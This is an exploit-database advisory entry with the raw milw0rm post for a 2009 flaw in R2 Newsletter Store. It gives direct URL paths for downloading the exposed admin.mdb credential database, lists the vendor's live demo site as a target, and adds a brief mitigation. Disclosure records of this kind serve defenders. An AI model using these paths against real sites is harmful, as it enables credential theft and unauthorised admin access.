R2 Newsletter Store (admin.mdb) Remote Admin Disclosure Vulnerability

vendor:

R2 Newsletter Store

by:

TiGeR-Dz

7,5

CVSS

HIGH

Remote Admin Disclosure Vulnerability

200

CWE

Product Name: R2 Newsletter Store

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

R2 Newsletter Store (admin.mdb) Remote Admin Disclosure Vulnerability

An attacker can gain access to the admin.mdb file by accessing the admin.asp page of the R2 Newsletter Store script. The attacker can then view the contents of the admin.mdb file, which contains sensitive information such as usernames and passwords.

Mitigation:

Ensure that the admin.mdb file is not accessible from the web server and that access to the admin.asp page is restricted to authorized users.

Source

Exploit-DB raw data:

 ---------------------------------------------------------------
 ---------------------------------------------------------------
R2 Newsletter Store (admin.mdb) Remote Admin Disclosure
 Vulnerability
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:http:/www.r2newsletter.com
 Script:R2 Newsletter Store 
 Download:http://www.r2newsletter.com/shop/store/dynamicIndex.asp
 ---------------------------------------------------------------
 Exploit:
 -------

 http://www.site.com/[script]/admin.asp

 go to 

http://www.site.com/[script]/admin.mdb
 --------------------------------------
 ----------------------------------------------------------------
 Dem0
 ----
 http://www.r2newsletter.com/statsdemo/admin.asp

 go to 

 http://www.r2newsletter.com/statsdemo/admin.mdb 

 --------------------------------------

 Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-06-01]